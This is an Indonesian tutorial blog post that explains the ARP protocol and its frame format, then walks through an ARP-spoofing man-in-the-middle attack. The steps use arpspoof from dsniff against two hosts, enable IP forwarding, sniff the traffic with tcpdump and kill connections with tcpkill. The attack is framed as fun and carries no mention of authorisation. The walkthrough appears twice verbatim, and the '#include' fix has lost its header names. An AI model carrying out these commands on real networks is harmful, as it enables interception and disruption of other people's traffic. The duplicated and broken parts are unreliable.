Tentang ARP: Bagian-bagiannya dan ARP Spoofing
gambar cara kerja ARP
Tentang ARP
WEBTKJ - Pada jaringan komputer terdapat protokol ARP atau Address Resolution Protocol adalah protokol untuk mapping dari alamat IP (Internet Protocol) ke alamat fisik MAC (Media Access Control). Misal di suatu jaringan kita ingin mengirim paket ke host A 192.168.1.2, maka pertama kita harus tahu sapa yg mempunyai alamat IP tersebut. Maka ARP akan membroadcast pertanyaan tsb ke semua host yang ada di jaringan.Sang pemilik alamat IP tersebut akan menjawab kembali sahutan tsb dengan mengirimkan alamat MACnya. Alamat MAC ini akan disimpan di tabel ARP untuk memudahkan pencarian jika diperlukan pengiriman paket ke tujuan yang sama.
Bagian-bagian ARP
Seperti apa bentuk format frame ARP? Terdiri dari 2 bagian, yaitu header ethernet dan paket ARP.
Header ethernet berupa:
- 6 byte alamat tujuan
- 6 byte alamat pengirim
- 2 byte jenis frame ARP
- 2 byte jenis alamat hardware (1 = ethernet)
- 2 byte jenis protokol yang di map (0800H = alamat IP)
- 1 byte ukuran alamat hardware
- 1 byte ukuran protokol
- 2 byte tipe operasi (1 = ARP request, 2=ARP reply, 3=*RARP request, 4=RARP reply)
- 6 byte alamat ethernet pengirim
- 4 byte alamat IP pengirim
- 6 byte alamat ethernet penerima
- 4 byte alamat IP penerima
Tentang ARP Spoofing
ARP Spoofing merupakan suatu kegiatan yang memanipulasi paket ARP. Misal paket X dari komputer A ditujukan untuk komputer B, ketika komputer A membroadcast paket ARP di jaringan, maka komputer C sang manipulator dapat "meracuni" (Posioning) paket ARP tsb agar paket X ditujukan ke komputer C terlebih dahulu baru diforward ke komputer B.
Poisoning ini mengganti alamat MAC komputer B dengan alamat MAC komputer C di tabel ARP komputer A dan sebaliknya, alamat MAC komputer A diganti menjadi alamat MAC komputer C di tabel ARP komputer B. Jenis-jenis serangan yang bisa dilakukan dengan ARP Spoofing diantaranya adalah sniffing, Man in the Middle, MAC Flooding, DoS (Denial of Service), Hijacking n Cloning.
Apa saja sih yg diperlukan buat ARP Spoofing ini? Kalo saya pakai arpspoof yang ada di paket dsniff-2.3 untuk OS Linux. sebelum menginstall dsniff ini perlu dicek apakah di sistem yang digunakan sudah terinstall libnet ma libnids. Jangan lupa untuk jenis attacking sniffing ato MIM perlu IP Forwarding diaktifkan (echo 1 > /proc/sys/net/ipv4/ip_forward).
Seperti biasa, unpack paket dsniff lalu configure dan terakhir pake install.Pas saat makai, saya sempat dapat error compiling module sshcrypto :
sshcrypto.c:30: error: parse error before "des_key_schedule"
....blablabla
....blablabla
*** Error code 1
Solusinya kita buka dan edit file sshcrypto.c di folder dsniff-2.3, tambahkan :
#include
#include
di deklarasi file header yang diperlukan. Bila sudah selesai dan tidak ada error lagi, coba jalankan si dsniff atau si arpspoof.
Kita coba meracuni dan ngendus paket antara komputer A 192.168.1.1 n komputer B 192.168.1.3, komputer C (attacker) 192.168.1.6.
Jalankan si arpspoof terlebih dahulu :
root@slack:~# arpspoof -t 192.168.1.1 192.168.1.3 & >/dev/null
root@slack:~# arpspoof -t 192.168.1.3 192.168.1.1 & >/dev/null
Kalo sudah benar nanti di console akan muncul seperti ini :
0:c:29:3e:2d:46 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:c:29:3e:2d:46
0:e0:29:63:d1:6 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:e0:29:63:d1:6
Setelah itu bisa kita endus pake dsniff ato tcpdump, misalkan mau pakai tcpdump bisa kita capture hasilna ke file, pake :
root@slack:~# tcpdump -i eth0 -w endus.txt
Dimana eth0 adalah interface card dan endus.txt adalah nama file outputna :). Kalo file tsb dibuka masi kaco isina >.<, jadi bisa kita lihat dengan tcpdump juga, pakai :
root@slack:~# tcpdump -r endus.txt
Lumayan asik kan ARP Spoofing, tidak hanya buat sniffing juga tapi bisa kita blok koneksi tertentu misal :
root@slack:~# tcpkill -9 host www.playboy.com
Untuk mematikan proses si arpspoof n tcpdump bisa dengan cara :
root@slack:~# killall arpspoof
root@slack:~# killall tcpdump
Apa saja sih yg diperlukan buat ARP Spoofing ini? Kalo saya pakai arpspoof yang ada di paket dsniff-2.3 untuk OS Linux. sebelum menginstall dsniff ini perlu dicek apakah di sistem yang digunakan sudah terinstall libnet ma libnids. Jangan lupa untuk jenis attacking sniffing ato MIM perlu IP Forwarding diaktifkan (echo 1 > /proc/sys/net/ipv4/ip_forward).
Seperti biasa, unpack paket dsniff lalu configure dan terakhir pake install.Pas saat makai, saya sempat dapat error compiling module sshcrypto :
sshcrypto.c:30: error: parse error before "des_key_schedule"
....blablabla
....blablabla
*** Error code 1
Solusinya kita buka dan edit file sshcrypto.c di folder dsniff-2.3, tambahkan :
#include
#include
di deklarasi file header yang diperlukan. Bila sudah selesai dan tidak ada error lagi, coba jalankan si dsniff atau si arpspoof.
Kita coba meracuni dan ngendus paket antara komputer A 192.168.1.1 n komputer B 192.168.1.3, komputer C (attacker) 192.168.1.6.
Jalankan si arpspoof terlebih dahulu :
root@slack:~# arpspoof -t 192.168.1.1 192.168.1.3 & >/dev/null
root@slack:~# arpspoof -t 192.168.1.3 192.168.1.1 & >/dev/null
Kalo sudah benar nanti di console akan muncul seperti ini :
0:c:29:3e:2d:46 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:c:29:3e:2d:46
0:e0:29:63:d1:6 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:e0:29:63:d1:6
Setelah itu bisa kita endus pake dsniff ato tcpdump, misalkan mau pakai tcpdump bisa kita capture hasilna ke file, pake :
root@slack:~# tcpdump -i eth0 -w endus.txt
Dimana eth0 adalah interface card dan endus.txt adalah nama file outputna :). Kalo file tsb dibuka masi kaco isina >.<, jadi bisa kita lihat dengan tcpdump juga, pakai :
root@slack:~# tcpdump -r endus.txt
Lumayan asik kan ARP Spoofing, tidak hanya buat sniffing juga tapi bisa kita blok koneksi tertentu misal :
root@slack:~# tcpkill -9 host www.playboy.com
Untuk mematikan proses si arpspoof n tcpdump bisa dengan cara :
root@slack:~# killall arpspoof
root@slack:~# killall tcpdump
Kesimpulan
Jadi, yang dimaksud dengan Address Resolution Protocol (ARP) adalah protokol jaringan yang penting dalam menghubungkan alamat IP dengan alamat MAC dalam jaringan komputer. ARP memungkinkan pengiriman paket data dengan efisien dan memainkan peran kunci dalam proses switching.
Dengan pemahaman yang baik tentang cara kerja ARP, kita dapat mengoptimalkan kinerja jaringan dan menjaga keamanan jaringan yang baik.
Posting Komentar untuk "Tentang ARP: Bagian-bagiannya dan ARP Spoofing"